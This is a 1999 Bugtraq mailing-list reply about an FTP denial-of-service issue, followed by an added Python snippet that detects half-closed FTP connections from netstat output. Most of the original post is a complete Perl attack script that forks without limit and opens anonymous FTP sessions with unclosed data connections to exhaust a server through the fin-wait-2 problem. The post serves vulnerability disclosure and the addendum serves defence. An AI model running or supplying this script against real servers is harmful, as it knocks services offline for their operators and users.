[12894] in bugtraq
Re: FTP denial of service attack
daemon@ATHENA.MIT.EDU (Darren Reed)
Wed Dec 8 23:37:27 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <199912080701.SAA19726@cairo.anu.edu.au>
Date: Wed, 8 Dec 1999 18:01:53 +1100
Reply-To: Darren Reed <avalon@COOMBS.ANU.EDU.AU>
From: Darren Reed <avalon@COOMBS.ANU.EDU.AU>
X-To: Theo de Raadt <deraadt@cvs.openbsd.org>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <199912080541.WAA07911@cvs.openbsd.org> from "Theo de Raadt" at
Dec 07, 1999 10:41:45 PM
In some mail from Theo de Raadt, sie said:
[...]
> The OpenBSD ftpd has never permitted more than 1 connection at a time
> in PASV mode, thus this particular denial of service attack does not
> work.
Excellent.
> I caused myself some difficulties by accidentally starting up 400 perl
> instances, though..
There's no helping pilot error ;)
Below is an attached perl script which attacks based on the fin-wait-2
`problem'.
Darren
#!/usr/bin/perl
$DOS_HOST="localhost";
use IO::Socket;
$pid = $$;
$num = 0;
while (1) {
    while (fork) {
        $sock = IO::Socket::INET->new(
            Proto => "tcp",
            PeerAddr => $DOS_HOST,
            PeerPort => "ftp(21)",
        );
        last if (!$sock);
        $me = getsockname($sock);
        ($mport, $mip) = unpack_sockaddr_in($me);
        if (!$sock) {
            print "connect failed!\n";
            waitpid -1,0;
        }
        $sock->autoflush(1);
        while (<$sock>) {
            print;
            print $sock "USER anonymous\r\n" if (/^220 .*/);
            print $sock "PASS root@\r\n" if (/^331 .*/);
            if (/^150 .*/) {
                $conn[$num++] = $x->accept();
            } elsif (/^200 .*/) {
                print $sock "NLST\r\n";
            } elsif (/^230 .*/ || /^226 .*/) {
                $x = IO::Socket::INET->new(
                    Proto => "tcp",
                    LocalAddr => inet_ntoa($mip),
                    Listen => 1,
                );
                last if (!$x);
                $lsock[$num] = $x;
                $local = getsockname($x);
                ($lport, $lip) = unpack_sockaddr_in($local);
                ($sip = inet_ntoa($mip)) =~ s/\./,/g;
                $lp[0] = $lport >> 8;
                $lp[1] = $lport & 0xff;
                print $sock "PORT $sip,$lp[1]\r\n";
            }
            last if (/^530 .*/);
        }
        waitpid -1,0;
    }
    sleep(5);
}
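As an added, server-side example (not part of Darren's post or of any ftpd), a small Python check that counts half-closed FTP sockets per remote host from netstat-style output, which is the symptom a client that never closes its data connections leaves on a server with the fin-wait-2 problem. The netstat lines are constructed, and the address format, the FTP ports watched and the alert threshold are assumptions.

```python
import re
from collections import Counter

# Constructed sample of `netstat -an`-style output (BSD "addr.port" form);
# 192.0.2.10 is the FTP server, 198.51.100.7 is a client holding several
# ftp-data sockets in FIN_WAIT_2, 203.0.113.5 is an ordinary client.
SAMPLE_NETSTAT = """\
tcp4       0      0  192.0.2.10.21          198.51.100.7.40010     ESTABLISHED
tcp4       0      0  192.0.2.10.20          198.51.100.7.40011     FIN_WAIT_2
tcp4       0      0  192.0.2.10.20          198.51.100.7.40013     FIN_WAIT_2
tcp4       0      0  192.0.2.10.20          198.51.100.7.40015     FIN_WAIT_2
tcp4       0      0  192.0.2.10.20          203.0.113.5.51000      FIN_WAIT_2
tcp4       0      0  192.0.2.10.22          203.0.113.5.51002      ESTABLISHED
"""

# Accept both "ip.port" (BSD) and "ip:port" (Linux) address renderings.
_ADDR = re.compile(r"^(.*)[.:](\d+)$")


def split_addr(addr):
    """Return (ip, port) for a netstat address, or (None, None) if unparsable."""
    m = _ADDR.match(addr)
    if not m:
        return None, None
    return m.group(1), int(m.group(2))


def fin_wait2_by_peer(netstat_text, local_ports=(20, 21)):
    """Count FIN_WAIT_2 sockets per remote IP whose local port is an FTP port."""
    counts = Counter()
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue
        local, remote, state = fields[3], fields[4], fields[5]
        if state != "FIN_WAIT_2":
            continue
        _, lport = split_addr(local)
        rip, _ = split_addr(remote)
        if lport in local_ports and rip is not None:
            counts[rip] += 1
    return counts


def suspicious_peers(netstat_text, threshold=3):
    """Remote IPs holding at least `threshold` half-closed FTP connections (threshold is assumed)."""
    return sorted(ip for ip, n in fin_wait2_by_peer(netstat_text).items() if n >= threshold)


if __name__ == "__main__":
    print(dict(fin_wait2_by_peer(SAMPLE_NETSTAT)))
    print(suspicious_peers(SAMPLE_NETSTAT))
```

On a live host, pipe `netstat -an` output into `suspicious_peers` and feed the result to whatever alerting or rate-limiting you already run; a kernel FIN_WAIT_2 timeout remains the actual mitigation.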